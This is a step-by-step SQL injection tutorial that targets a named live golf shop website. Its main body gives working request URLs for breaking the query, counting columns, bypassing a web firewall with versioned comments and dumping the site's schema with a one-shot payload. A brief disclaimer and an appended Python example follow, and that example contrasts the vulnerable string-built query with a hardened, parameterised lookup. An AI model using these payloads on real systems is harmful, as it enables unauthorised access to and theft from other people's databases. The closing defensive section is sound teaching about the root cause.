Step by Step SQL Injection Attack Tutorial


In this tutorial, we will describe how to use SQL injection to get some useful information from a website.


Target Site - http://www.slightergolf.com

Step 1

Break The Query. Let's Do It With A Single Quote ( ' )

Like This :

http://www.slightergolf.com/products/shop.php?c=misc&id=8'

The Site Generates An Error Like This:

(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)

Step 2

Now Fix The Query, Like This...

http://www.slightergolf.com/products/shop.php?c=misc&id=8' --+

But The Error Is Still Not Fixed ..!! Now Try This One,

http://www.slightergolf.com/products/shop.php?c=misc&id='8' --+

Now Error Is Fixed ....!!

Step 3

Find The Total Number Of Columns

There Are 3 Methods I Know To Find The Total Number Of Columns.

Method 1 - ORDER BY

Let's Try,

http://www.slightergolf.com/products/shop.php?c=misc&id='8' order by 100--+

Now The Site Shows An Error Like This,

(Unknown column '100' in 'order clause')

Now We Decrease The Number Like This: Order By 90, Order By 80, Order By 70, Order By 60,...

We Keep Decreasing The Number While The Error Is Not Fixed ...!!

In This Case (Site) The Error Is Fixed At "Order By 11"

http://www.slightergolf.com/products/shop.php?c=misc&id='8' order by 11--+

So, It Means There Are 11 Columns In Total In This Site...

Method 2 - GROUP BY

Like This,

http://www.slightergolf.com/products/shop.php?c=misc&id='8' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+

And We Get An Error Like This,

(Unknown column '12' in 'group statement')

It Means There Are 11 Columns In Total In This Site.

Method 3 - PROCEDURE ANALYSE()

This Still Does Not Work On This Site...

Step 4

Now We Move On To Getting The Vulnerable Column Numbers

Like This,

http://www.slightergolf.com/products/shop.php?c=misc&id='8' union select 1,2,3,4,5,6,7,8,9,10,11--+

But There Is Still A Fu**ing Firewall ...

Now Try To Bypass This... Like This,

http://www.slightergolf.com/products/shop.php?c=misc&id='8' /!50000union/ select 1,2,3,4,5,6,7,8,9,10,11--+

Now We Have Bypassed The Firewall...

But We Are Not Getting The Vulnerable Column Numbers Here...

Now Try This,

http://www.slightergolf.com/products/shop.php?c=misc&id=-'8' /!50000Union/ Select 1,2,3,4,5,6,7,8,9,10,11--+

Yeah, We Are Getting All The Vulnerable Column Numbers

Like This: 5, 8.

Step 5

Now Try To Dump All "Databases, Tables, Columns" Using DIOS (Dump in One Shot)

Like This,

http://www.slightergolf.com/products/shop.php?c=misc&id=-'8' /!50000Union/ Select 1,2,3,4,/!00000concat/!(0x223e,version(),(Select(@) from (selecT(@:=0x00),(select(0) from (/!information_Schema/.columns) where (table_Schema=database())and(0x00)in(@:=concat/!(@,0x3c62723e,table_name,0x3a3a,column_name))))x))/,6,7,8,9,10,11--+

And We Are Injecting This Site...


Disclaimer: This tutorial is for educational purposes only and is not intended to be put into practice unless you have authorised access to the website you are trying to break into.
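
The errors in Steps 1 to 4 all come from the id parameter being concatenated into the SQL string. The following is an added example (not code from this post or from the target site) that puts that pattern beside a hardened lookup using an allow-list check and a bound parameter. It uses Python's sqlite3 as an offline stand-in for the site's PHP/MySQL code, so the error text differs from the MySQL messages quoted above; the table, column names, rows and sample inputs are constructed assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the shop's product table (schema and rows are assumptions).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, category TEXT, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(8, "misc", "Ball marker"), (9, "misc", "Tee pack")])
    return db

def lookup_vulnerable(db, raw_id):
    # Root cause: the id parameter is pasted into the SQL text, so it is parsed as SQL.
    sql = "SELECT id, category, name FROM products WHERE id = " + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the database error to the client is what leaks the column count.
        return "SQL error: %s" % exc

def lookup_hardened(db, raw_id):
    # 1) Allow-list: a product id is a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # caller answers with a generic 400, no database detail
    # 2) Bound parameter: the value travels separately from the SQL text.
    sql = "SELECT id, category, name FROM products WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Constructed inputs in the shape of the requests in Steps 1, 3 and 4.
SAMPLES = ["8", "8'", "8 order by 100", "8 order by 3", "-8 union select 1,2,3"]

if __name__ == "__main__":
    db = make_db()
    for raw in SAMPLES:
        print(repr(raw))
        print("  vulnerable:", lookup_vulnerable(db, raw))
        print("  hardened:  ", lookup_hardened(db, raw))
```

The firewall in Step 4 only filtered one spelling of the keyword; the bound parameter removes the injection point itself, so no spelling of the input reaches the SQL parser.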
